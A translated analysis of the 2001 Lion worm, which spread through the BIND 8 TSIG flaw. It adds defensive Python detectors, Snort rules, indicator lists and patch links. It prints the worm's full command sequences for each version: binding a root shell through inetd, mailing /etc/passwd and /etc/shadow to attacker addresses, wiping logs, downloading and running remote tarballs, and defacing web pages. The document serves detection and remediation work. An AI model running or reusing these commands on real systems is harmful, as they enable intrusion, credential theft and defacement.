Virus sample
http://www.xfocus.net/tools/200108/lion.tgz
I have looked at its distribution structure and infection characteristics: nothing new or different, the same propagation mechanism as Ramen, but it is a good template for a virus.
The Lion worm has attracted wide attention from SANS (http://www.sans.org). It originated with the Honker Union of China (HUC, the "Red Guest" alliance); its author was a Chinese "red guest" using the name lion. The worm is part of that organisation's retaliation for the revised Japanese textbooks. Judging from the systems it infects, its main purpose is to collect system information, probably as a prelude to a further attack. HUC's declaration about the Lion worm reads: "Because of Japan's disrespect, Cnhonker has been roused, and the Lion worm is not sheep. They must be answered for. They must assume the obligation with their crime." The author of the original article expresses his dissatisfaction with this and thinks the Lion worm should not be spread for such a purpose; I omitted that part in translation.

Looked at purely technically, however, the worm contains almost nothing new: it is plagiarism. That its spread caused such a stir is mainly due to a security vulnerability in BIND 8. It is these security weaknesses that let the Lion worm attack DNS systems and spread quickly.

Summary

The Lion worm exists in three distinct versions and is driven by scripts. The first version consists of an infection routine and the t0rn rootkit; the second is an improved first version without the rootkit; the third is almost a copy of the Ramen worm, with only the exploit section replaced by one that uses the BIND 8 defect. All three share the same core: a port scanner that uses full TCP connections, the BIND 8 exploit program, and scripts that tie the pieces together and drive the worm. The first two versions download the worm from a single server (a FreeBSD server in China).
The third version uses distributed propagation code and downloads itself from the previously infected system; this code comes from the Ramen worm. The files found in all discovered Lion worms are the following:

1) li0n.sh. Author: the worm's author. Shell script: deletes the tcpwrappers access control lists, runs getip.sh, adds the worm's startup script, then runs star.sh.
2) getip.sh. Author: the worm's author. Shell script: sends the system's IP address, operating system version, /etc/passwd and /etc/shadow to the attacker's e-mail address (li0nkit@china.com).
3) star.sh. Author: the worm's author. Shell script: starts scan.sh and hack.sh as background processes.
4) scan.sh. Author: the worm's author. Shell script: stops all BIND processes running locally, runs randb to select a class B network, then runs pscan against it and saves the results in bindname.log.
5) randb. Author unknown. Linux ELF binary that prints a random class B IP address; very similar to the gimmeRAND.c file of ADMw0rm.
6) pscan. Author unknown. Linux ELF binary; a port scanner that scans a single TCP port over a given class A, B or C range. First seen here; the source code contains no author statement.
7) hack.sh. Author: the worm's author. Shell script: reads targets from bindname.log and attacks them with bindx.sh.
8) bindx.sh. Author: the worm's author. Shell script: starts the BIND attack against the remote target.
9) bind. Author: LSD. Linux ELF binary that attacks BIND 8.2.x servers with the security flaw.

This is a typical worm, plagiarised from earlier worms such as ADMw0rm (1998), the Millennium worm (1999) and the Ramen worm (2001). The bindx.sh file is redundant unless hack.sh is meant to drive several attack scripts: the worm's author included only one attack program but left room for more. The other scripts are likewise adapted from other worms.

All three versions of the Lion worm infect and reproduce in the same way. The worm's network activity starts at port 53/tcp, with a scan of a randomly chosen class B address range. When a BIND name server is found, the attack program is launched against it. After a successful attack, a download command fetches the worm onto the compromised host, unpacks it and runs the startup script.

The first step of the Lion worm is to probe a random class B address space with pscan. I modified the randb program so that it always returns 10.0.0. The reason I chose the class C address space 10.0.0.0/24 was only to reduce the size of the log file. The pscan program uses a full-connect scan, sending a SYN to every address in the space, which makes the scan faster but adds more "noise" to the logs. The target host, 10.0.0.23, runs Red Hat Linux 6.2. The attacking host, infected with the Lion worm, is on another subnet; a TCP-based port scanner would not reach the hosts on this subnet unless ARP requests for them were answered.
Establishing the complete connection (the microsecond part of three timestamps and, in two packets, the source address were lost in this copy; the addresses follow from the replies):

03/26-02:09:58.xxxxxx 192.168.0.3:4556 -> 10.0.0.23:53
TCP TTL:64 TOS:0x0 ID:56799 IpLen:20 DgmLen:60 DF
******S* Seq: 0x16322CA3  Ack: 0x0  Win: 0x7D78  TcpLen: 40

03/26-02:09:58.247112 10.0.0.23:53 -> 192.168.0.3:4556
TCP TTL:64 TOS:0x0 ID:749 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0x8BACEBE6  Ack: 0x16322CA4  Win: 0x7D78  TcpLen: 40

03/26-02:09:58.xxxxxx 192.168.0.3:4556 -> 10.0.0.23:53
TCP TTL:64 TOS:0x0 ID:56930 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x16322CA4  Ack: 0x8BACEBE7  Win: 0x7D78  TcpLen: 32

A very clean teardown:

03/26-02:09:58.344645 192.168.0.3:4556 -> 10.0.0.23:53
TCP TTL:64 TOS:0x0 ID:56932 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x16322CA4  Ack: 0x8BACEBE7  Win: 0x7D78  TcpLen: 32

03/26-02:09:58.xxxxxx 10.0.0.23:53 -> 192.168.0.3:4556
TCP TTL:64 TOS:0x0 ID:750 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x8BACEBE7  Ack: 0x16322CA5  Win: 0x7D78  TcpLen: 32

03/26-02:09:58.386565 10.0.0.23:53 -> 192.168.0.3:4556
TCP TTL:64 TOS:0x0 ID:751 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x8BACEBE7  Ack: 0x16322CA5  Win: 0x7D78  TcpLen: 32

03/26-02:09:58.386614 192.168.0.3:4556 -> 10.0.0.23:53
TCP TTL:64 TOS:0x0 ID:56934 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x16322CA5  Ack: 0x8BACEBE8  Win: 0x7D78  TcpLen: 32

Once pscan finds that 10.0.0.23 meets its requirements, it adds the address to bindname.log. The hack.sh script runs in parallel with the scanner and watches bindname.log. As soon as a new IP address appears in bindname.log, hack.sh launches the attack program against that host.

The BIND attack program was released by LSD (The Last Stage of Delirium), and all three versions of the Lion worm use it as their exploit. LSD published linx86_bind.c on its web site on 8 February 2001, and that is the version Lion v1.0 uses. The next day LSD updated the exploit without changing the file name, making only slight changes; the update made no technical change.
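The full-connect scan shown above leaves a characteristic trace: one source opening connections to 53/tcp on host after host, with a clean teardown each time. The following Python script is an added example, not code from the original article and not part of the worm: it parses a constructed packet log in the three-line layout Snort uses above, keeps only the opening SYNs to port 53 (replies and the handshake's third packet carry ACK and are ignored), and reports any source that reached three or more distinct hosts within five seconds, the thresholds of the portscan preprocessor setting quoted later, applied per destination host. The sample log lines and the year 2001 supplied to the timestamp parser are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in Snort's packet-log layout (not a capture from the article):
# 192.168.0.3 sends one SYN to 53/tcp on three hosts of 10.0.0.0/24 within a
# second, as pscan does; 10.0.0.23 answers with SYN/ACK; 192.168.0.9 makes a
# single, ordinary TCP DNS connection.
SAMPLE_LOG = """\
03/26-02:09:58.101000 192.168.0.3:4556 -> 10.0.0.21:53
TCP TTL:64 TOS:0x0 ID:56790 IpLen:20 DgmLen:60 DF
******S* Seq: 0x16322C00  Ack: 0x0  Win: 0x7D78  TcpLen: 40

03/26-02:09:58.201000 192.168.0.3:4557 -> 10.0.0.22:53
TCP TTL:64 TOS:0x0 ID:56791 IpLen:20 DgmLen:60 DF
******S* Seq: 0x16322C10  Ack: 0x0  Win: 0x7D78  TcpLen: 40

03/26-02:09:58.301000 192.168.0.3:4558 -> 10.0.0.23:53
TCP TTL:64 TOS:0x0 ID:56792 IpLen:20 DgmLen:60 DF
******S* Seq: 0x16322CA3  Ack: 0x0  Win: 0x7D78  TcpLen: 40

03/26-02:09:58.347112 10.0.0.23:53 -> 192.168.0.3:4558
TCP TTL:64 TOS:0x0 ID:749 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0x8BACEBE6  Ack: 0x16322CA4  Win: 0x7D78  TcpLen: 40

03/26-02:10:30.500000 192.168.0.9:1025 -> 10.0.0.23:53
TCP TTL:64 TOS:0x0 ID:1200 IpLen:20 DgmLen:60 DF
******S* Seq: 0x01020304  Ack: 0x0  Win: 0x7D78  TcpLen: 40
"""

HEADER_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d{1,6})\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s*$"
)
# Snort prints the TCP flags as an 8-position string ("12UAPRSF", '*' = clear).
FLAGS_RE = re.compile(r"^(?P<flags>[*12UAPRSF]{6,8})\s+Seq:")


def parse_packets(text, year=2001):
    """Return (timestamp, src, dst, dport, flags) for each three-line TCP record.

    Snort's packet log carries no year, so one is supplied (an assumption for
    the constructed sample).
    """
    lines = text.splitlines()
    records = []
    i = 0
    while i < len(lines):
        m = HEADER_RE.match(lines[i])
        if m and i + 2 < len(lines) and lines[i + 1].startswith("TCP"):
            f = FLAGS_RE.match(lines[i + 2])
            if f:
                ts = datetime.strptime(f"{year}/{m['ts']}", "%Y/%m/%d-%H:%M:%S.%f")
                records.append((ts, m["src"], m["dst"], int(m["dport"]), f["flags"]))
            i += 3
        else:
            i += 1
    return records


def find_scanners(records, port=53, hosts=3, seconds=5):
    """Map source -> sorted targets for every source whose opening SYNs (SYN set,
    ACK clear) reached at least `hosts` distinct addresses on `port` within
    `seconds`.  Replies and later handshake packets carry ACK and are skipped."""
    syns = defaultdict(list)
    for ts, src, dst, dport, flags in records:
        if dport == port and "S" in flags and "A" not in flags:
            syns[src].append((ts, dst))
    window = timedelta(seconds=seconds)
    hits = {}
    for src, events in syns.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            reached = {dst for ts, dst in events[i:] if ts - t0 <= window}
            if len(reached) >= hosts:
                hits[src] = sorted({dst for _, dst in events})
                break
    return hits


if __name__ == "__main__":
    for src, targets in find_scanners(parse_packets(SAMPLE_LOG)).items():
        print(f"{src} probed 53/tcp on {len(targets)} hosts: {', '.join(targets)}")
```

The per-host threshold is what distinguishes pscan's sweep from a busy resolver: a legitimate client talks to one or two name servers repeatedly, while the worm touches each address of a /24 once and moves on.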
The one significant change in the new exploit code is that it takes different command-line parameters. By observing the command-line parameters, I determined that Lion v1.0 uses the exploit code released on 8 February, while the last two versions use the updated version.
Moreover, each version uses a different command against the remote BIND host. I set up a sample target platform for the Lion worm: a server with Red Hat 6.2 installed, which I believe is the most widespread Linux distribution and version on the Internet and therefore the most typical target. Although the exploit code explicitly lists Red Hat 6.2 as attackable, named is not a service that is started by default. When it is enabled (via linuxconf or ntsysv), named runs as the user named. Only when named is added to a startup script by hand does it run with root privileges, and only then does the attack matter.

Because every version of the worm uses the same attack program, the captured packets are almost identical apart from the command. First, the attack program establishes a TCP connection with the named process on the target host; then it sends a custom UDP IQUERY packet to the target and uses the BIND infoleak bug to determine the base pointer of the named process's stack. With that information it constructs the TSIG exploit packet, which overflows a buffer in named. After the overflow, the exploit's root shell walks the file descriptors opened by the named process, finds the descriptor of the TCP session established at the start, uses the dup() system call to copy that socket descriptor onto stdin, stdout and stderr, and finally starts a new /bin/sh process. The TCP session is now bound to a root shell, and the attack program can issue commands.
The commands the Lion worm issues through the attack program are:

1) Lion v1.0:

PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin'; export PATH;
export TERM=vt100;
rm -rf /dev/.lib; mkdir /dev/.lib; cd /dev/.lib;
echo '1008 stream tcp nowait root /bin/sh sh' >> /etc/inetd.conf; killall -HUP inetd;
ifconfig -a > 1i0n; cat /etc/passwd >> 1i0n; cat /etc/shadow >> 1i0n;
mail 1i0nip@china.com < 1i0n; rm -fr 1i0n; rm -fr /.bash_history;
lynx -dump http://coolion.51.net/crew.tgz > 1i0n.tgz; tar -zxvf 1i0n.tgz; rm -fr 1i0n.tgz;
cd lib; ./1i0n.sh; exit;

2) Lion v2.0:

PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin'; export PATH;
export TERM=vt100;
rm -rf /dev/.lib; mkdir /dev/.lib; cd /dev/.lib;
echo '1008 stream tcp nowait root /bin/sh sh' >> /etc/inetd.conf; killall -HUP inetd;
ifconfig -a > 1i0n; cat /etc/passwd >> 1i0n; cat /etc/shadow >> 1i0n;
mail 1i0nip@china.com < 1i0n; rm -fr 1i0n; rm -fr /.bash_history;
echo > /var/log/messages; echo > /var/log/maillog;
lynx -dump http://coolion.51.net/crew.tgz > 1i0n.tgz; tar -zxvf 1i0n.tgz; rm -fr 1i0n.tgz;
cd lib; ./1i0n.sh; exit

3) Lion v3.0:

PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin'; export PATH;
export TERM=vt100;
rm -rf /dev/.lib; mkdir /dev/.lib; cd /dev/.lib;
echo '10008 stream tcp nowait root /bin/sh sh' >> /etc/inetd.conf; killall -HUP inetd;
ifconfig -a > 1i0n; cat /etc/passwd >> 1i0n; cat /etc/shadow >> 1i0n;
mail huckit@china.com < 1i0n; rm -fr 1i0n; rm -fr /.bash_history;
echo > /var/log/messages; rm -rf /var/log/maillog;
echo 'Powered by HUC (C0011i0N) .----- 1i0n crew' > index.html;
echo '#!/bin/sh' > lion;
echo 'nohup find / -name "index.html" -exec /bin/cp index.html {} \;' >> lion;
echo 'tar -xf 1i0n.tar' >> lion; echo './1i0n.sh' >> lion; echo >> lion; echo >> lion;
chmod 755 lion;
TERM='linux' export PATH='/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/bin' lynx -source http://previous-host-ip:27374 > 1i0n.tar;
./lion

The most critical difference between the three versions of the Lion worm is this: the first two download the worm with lynx from a web site and have no distributed propagation capability; the third uses the asp code from the Ramen worm, which makes the attacked host download the worm file from port 27374 of the attacking host. That port is used by the asp program, which is started by inetd; the service name in inetd.conf is asp, and the corresponding port in the /etc/services file of a Red Hat 6.2 system is also 27374. When the Lion worm infects a remote system, it downloads its own code, unpacks it and starts it on the newly compromised host through the exploit program. The infection process is shown in the figure.

How to prevent it from spreading

Because the Lion worm propagates only through the BIND 8 TSIG bug, infection can be stopped by patching that defect. Since 2001 vendors have provided security patches, and the affected Linux distributions have released upgraded RPM packages. Remote exploit code for this defect circulates widely on online forums and web sites, and despite the availability of reliable patches the defect is still present on many systems. Trying to hide the BIND version or the server's operating system does not prevent infection, because the worm attacks every BIND server it discovers: the exploit code written by LSD uses the BIND 8 infoleak defect to determine automatically whether a system can be exploited. Caldera, Conectiva, Debian, Immunix, Mandrake, Red Hat, Slackware, SuSE and TurboLinux have released patches and upgraded versions for this defect.
The related links are:

Caldera: http://www.caldera.com/support/security/advisories/cssa-2001-008.1.txt
Conectiva: http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000377
Debian: http://www.debian.org/security/2001/dsa-026
Immunix: http://download.immunix.org/immunixos/7.0-beta/Updates/IMNX-2001-70-001-01
Mandrake: http://www.linux-mandrake.com/en/security/2001/mdksa-2001-017.php3
Red Hat: http://www.redhat.com/support/errata/rhsa-2001-007.html
Slackware: http://www.linuxsecurity.com/advisories/slackware_advisory-1121.html
SuSE: http://www.suse.com/de/support/security/2001_003_bind8_txt.txt
TurboLinux: http://www.turbolinux.com/pipermail/tl-security-announce/2001-February/000034.html

How to check whether your system is infected

On Red Hat 6.2, neither the scan nor the BIND exploit attack leaves a record in the system logs; other systems may differ. Although all three versions of the Lion worm truncate or delete /var/log/maillog, the messages the worm sends can be tracked at a proxying mail gateway or firewall.
The e-mail addresses used by the three versions are:

1) Lion v1.0: li0niffer@china.com
2) Lion v2.0: li0nip@china.com, li0nkit@china.com
3) Lion v3.0: huckit@china.com

The files changed by the Lion worm are the following.

1) Lion v1.0

Changed by the BIND exploit program:
  /dev/.lib/ directory and its contents
  /etc/inetd.conf: '1008 stream tcp nowait root /bin/sh sh' added
  /.bash_history deleted
Changed by the worm scripts:
  /etc/rc.d/rc.sysinit: new entry '/dev/.lib/lib/scan/star.sh'
  /etc/hosts.deny deleted and replaced by an empty file (a placeholder file is present by default)
Changed by the t0rn rootkit:
  /etc/inetd.conf: '60008 stream tcp nowait root /bin/sh sh' added
  /etc/inetd.conf: '33567 stream tcp nowait root /bin/sh sh' added
  /etc/ttyhash added to the system (hash of the Chinese Honker password)
  /usr/man/man1/man1/lib/.lib/ directory and its contents
  /usr/src/.puta/ directory and its contents
  /usr/info/.t0rn/ directory and its contents
  /bin/mjy added to the system (log-wiping tool)
  /usr/man/man1/man1/lib/.lib/.x added to the system (SUID root shell)
  /etc/rc.d/rc.sysinit: nscd (not part of the worm) and the trojaned in.telnetd added
  /tmp/.pinespool (temporary copy of inetd.conf)
  /root/.bash_history removed
  /var/log/messages truncated
  /var/log/maillog truncated
Trojaned binaries: /bin/in.telnetd, /usr/sbin/in.fingerd, /bin/ps, /sbin/ifconfig, /usr/bin/du, /bin/netstat, /usr/bin/file
Note: William Stearns wrote lionfind-0.1.tar.gz, a tool that checks whether a system is infected with Lion.

2) Lion v2.0

Changed by the BIND exploit program (as in v1.0):
  /dev/.lib/ directory and its contents
  /etc/inetd.conf: '1008 stream tcp nowait root /bin/sh sh' added
  /.bash_history removed
  /var/log/messages truncated
  /var/log/maillog truncated
Changed by the worm scripts:
  /etc/rc.d/rc.sysinit: '/dev/.lib/lib/scan/star.sh' added (wrong directory, buddy)
  /etc/hosts.deny deleted (an empty placeholder file is present by default)

3) Lion v3.0

Changed by the BIND exploit program:
  /dev/.lib/ directory and its contents
  /etc/inetd.conf: '10008 stream tcp nowait root /bin/sh sh' added
  /.bash_history deleted
  /var/log/messages truncated
  /var/log/maillog deleted
  all index.html files overwritten with "Powered by HUC (C0011i0n) .----- 1i0n crew"
Changed by the worm scripts:
  /sbin/asp added (a lite web server that lets the next system download the worm)
  /tmp/ramen.tgz (the Lion author used the asp62 binary from the Ramen worm)
  /etc/inetd.conf: 'asp stream tcp nowait root /sbin/asp' added
  /etc/rc.d/rc.sysinit: '/dev/.lib/star.sh' added
  /etc/hosts.deny deleted (replaced with an empty file)
  all index.html files replaced by the "Lion Crew" defacement

The following ports are the Lion worm's backdoors; version 1.0 has a particularly large number of them.

Lion v1.0:
  telnetd listening on 23/tcp, login with the password cnhonker; from the t0rn rootkit
  /bin/sh bound to 1008/tcp; from the BIND 8 attack program
  /bin/sh bound to 2555/tcp; from the t0rn rootkit, activated by the trojaned in.fingerd program
  /bin/sh bound to 33567/tcp; from t0rn
  sshd listening on 33568/tcp, login with the password cnhonker; from the t0rn rootkit
  /bin/sh bound to 60008/tcp; from t0rn
Lion v2.0:
  /bin/sh bound to port 1008; from the BIND 8 attack program
Lion v3.0:
  /bin/sh bound to port 1008; from the BIND 8 attack program
  /sbin/asp bound to 27374/tcp, a lightweight web server used to download the worm

Detection

Infection by the worm can be detected with the Snort ArachNIDS rules below.
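Before the network signatures, the host side: the file-change and backdoor lists above amount to a checklist of the kind lionfind automated. The following Python script is an added example, not lionfind and not code from the original article. It looks under a filesystem root for the paths the lists name, flags inetd.conf entries that hand a port to /bin/sh or /sbin/asp or that use one of the listed backdoor ports or the asp service name, looks for /dev/.lib in the rc scripts, reports an empty /etc/hosts.deny, and checks web document roots for the defacement string. The web-root locations and the sample tree built by build_demo_tree() are assumptions; on a live host call scan('/'), on a mounted image scan(mount_point).

```python
import tempfile
from pathlib import Path

# Indicators taken from the file-change and backdoor lists above (paths are
# relative to the filesystem root so the check can also run on a mounted image).
SUSPICIOUS_PATHS = [
    "dev/.lib",                      # all three versions
    "usr/man/man1/man1/lib/.lib",    # t0rn rootkit (v1.0)
    "usr/src/.puta",                 # t0rn rootkit (v1.0)
    "usr/info/.t0rn",                # t0rn rootkit (v1.0)
    "etc/ttyhash",                   # t0rn rootkit (v1.0)
    "bin/mjy",                       # log-wiping tool (v1.0)
    "tmp/.pinespool",                # temporary copy of inetd.conf (v1.0)
    "sbin/asp",                      # Ramen-derived download server (v3.0)
    "tmp/ramen.tgz",                 # v3.0
]
BACKDOOR_SERVICES = {"1008", "10008", "60008", "33567", "2555", "33568", "27374", "asp"}
DEFACEMENT = "Powered by HUC"
# Assumed document roots; Red Hat 6.2 served Apache pages from /home/httpd/html.
WEB_ROOTS = ("home/httpd/html", "var/www")


def inetd_findings(root):
    """Flag inetd.conf entries whose server program is a shell or /sbin/asp, or
    whose service field is one of the worm's backdoor ports or names."""
    conf = Path(root, "etc/inetd.conf")
    findings = []
    if not conf.is_file():
        return findings
    for line in conf.read_text(errors="replace").splitlines():
        fields = line.split()          # service socktype proto wait user server args
        if not fields or fields[0].startswith("#"):
            continue
        server = fields[5] if len(fields) > 5 else ""
        if server in ("/bin/sh", "/sbin/asp") or fields[0] in BACKDOOR_SERVICES:
            findings.append(f"inetd.conf: {line.strip()}")
    return findings


def scan(root="/"):
    """Return human-readable findings; an empty list means no indicator was seen."""
    root = Path(root)
    findings = [f"present: /{rel}" for rel in SUSPICIOUS_PATHS if (root / rel).exists()]
    findings += inetd_findings(root)
    for rc in ("etc/rc.d/rc.sysinit", "etc/rc.d/rc.local"):
        p = root / rc
        if p.is_file():
            for line in p.read_text(errors="replace").splitlines():
                if "/dev/.lib" in line:
                    findings.append(f"{rc}: {line.strip()}")
    deny = root / "etc/hosts.deny"
    if deny.is_file() and deny.stat().st_size == 0:
        findings.append("etc/hosts.deny is empty (the default file carries comments)")
    for wr in WEB_ROOTS:
        if (root / wr).is_dir():
            for page in (root / wr).rglob("index.html"):
                if DEFACEMENT in page.read_text(errors="replace"):
                    findings.append(f"defaced: {page.relative_to(root).as_posix()}")
    return findings


def build_demo_tree(root, infected=True):
    """Create a constructed sample tree under root (an assumption, not a real victim)."""
    root = Path(root)
    for d in ("etc/rc.d", "home/httpd/html"):
        (root / d).mkdir(parents=True, exist_ok=True)
    inetd = ["ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a"]
    rc = ["# constructed rc.sysinit fragment"]
    deny, page = "# hosts.deny: see hosts_access(5)\n", "<html>welcome</html>\n"
    if infected:
        (root / "dev/.lib/lib/scan").mkdir(parents=True, exist_ok=True)
        inetd.append("1008 stream tcp nowait root /bin/sh sh")
        rc.append("/dev/.lib/lib/scan/star.sh")
        deny, page = "", "Powered by HUC (C0011i0n) .----- 1i0n crew\n"
    (root / "etc/inetd.conf").write_text("\n".join(inetd) + "\n")
    (root / "etc/rc.d/rc.sysinit").write_text("\n".join(rc) + "\n")
    (root / "etc/hosts.deny").write_text(deny)
    (root / "home/httpd/html/index.html").write_text(page)


def demo(infected=True):
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp, infected)
        return scan(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Because v1.0 ships trojaned ps, netstat and ifconfig, run the check from a trusted toolset or against the disk from a clean system; the script only reads files, so it does not depend on those binaries, but anything that lists processes or sockets on the live host would.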
The pscan scan is caught by starting Snort's portscan plug-in with the following setting, which watches $INTERNAL, alerts when 3 ports are hit within 5 seconds, and logs to /var/log/snort/portscan:

$INTERNAL 3 5 /var/log/snort/portscan

The BIND infoleak probe is detected with the following rule:

alert UDP $EXTERNAL any -> $INTERNAL 53 (msg:"IDS482/named-exploit-infoleak-lsd"; content:"|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 20 20 20 20 02 61|"; reference:arachnids,482;)

The BIND 8 TSIG buffer overflow is detected with this ArachNIDS rule:

alert UDP $EXTERNAL any -> $INTERNAL 53 (msg:"IDS489/named-exploit-tsig-lsd"; content:"|3F 909090 EB3B 31DB 5F 83EF7C 8D7710 897704 8D4F20|"; reference:arachnids,489;)

The outgoing e-mail can also be detected. Adding e-mail detection costs IDS performance, however, and the worm sends no mail in cases where the above rules have not already fired.
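To see what the two rules actually key on, the following Python script (an added example, not part of the original article and not Snort code) parses the content option of each rule into bytes the way Snort reads it, matches it against UDP payloads, and decodes the DNS header that the IDS482 pattern pins down: query ID 0xABCD, opcode 1 (the obsolete IQUERY), no question and one answer record, a combination no ordinary resolver sends. The normal query and the suspect payload (the rule's own pattern followed by zero padding) are constructed, not captured.

```python
import re
import struct

# The two ArachNIDS rules quoted above, kept as rule text so the content option
# is parsed exactly as Snort reads it (hex between pipes, literal text outside).
INFOLEAK_RULE = (
    'alert UDP $EXTERNAL any -> $INTERNAL 53 (msg:"IDS482/named-exploit-infoleak-lsd"; '
    'content:"|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 20 20 20 20 02 61|"; '
    'reference:arachnids,482;)'
)
TSIG_RULE = (
    'alert UDP $EXTERNAL any -> $INTERNAL 53 (msg:"IDS489/named-exploit-tsig-lsd"; '
    'content:"|3F 909090 EB3B 31DB 5F 83EF7C 8D7710 897704 8D4F20|"; '
    'reference:arachnids,489;)'
)
RULES = [INFOLEAK_RULE, TSIG_RULE]


def rule_option(rule, name):
    """Return the quoted value of a rule option such as msg or content."""
    m = re.search(name + r':"([^"]*)"', rule)
    if not m:
        raise ValueError(f"rule has no {name} option")
    return m.group(1)


def rule_content(rule):
    """Convert the content option to bytes: |..| sections are hex, the rest literal."""
    out = bytearray()
    for i, part in enumerate(rule_option(rule, "content").split("|")):
        if i % 2:                                   # odd pieces sit between pipes
            out += bytes.fromhex(part.replace(" ", ""))
        else:
            out += part.encode("latin-1")
    return bytes(out)


def match_payload(rules, payload):
    """msg of every rule whose content occurs anywhere in the UDP payload
    (Snort's content test is unanchored unless offset/depth are given)."""
    return [rule_option(r, "msg") for r in rules if rule_content(r) in payload]


def dns_header(payload):
    """Decode the 12-byte DNS header fields that the IDS482 pattern fixes."""
    ident, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", payload[:12])
    return {
        "id": ident,
        "qr": flags >> 15,
        "opcode": (flags >> 11) & 0xF,   # 0 = QUERY, 1 = IQUERY (obsolete inverse query)
        "rd": (flags >> 8) & 1,
        "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar,
    }


def build_query(name="www.example.com", ident=0x1234):
    """Constructed ordinary A query: standard opcode, one question, no answers."""
    header = struct.pack("!HHHHHH", ident, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)    # QTYPE A, QCLASS IN


# Constructed suspect payload: the IDS482 pattern itself followed by zero padding.
SUSPECT = rule_content(INFOLEAK_RULE) + b"\x00" * 16

if __name__ == "__main__":
    for label, pkt in (("normal query", build_query()), ("suspect", SUSPECT)):
        print(label, dns_header(pkt), match_payload(RULES, pkt))
```

Since the IDS482 pattern begins with the DNS header, a real packet that matches it does so at payload offset 0; the header decode above is the check to apply when a match has to be confirmed by hand. The IDS489 pattern, by contrast, is a fragment of the exploit's code (the 0x90 bytes are x86 NOPs) and can sit anywhere inside the oversized TSIG record, which is why that rule is unanchored.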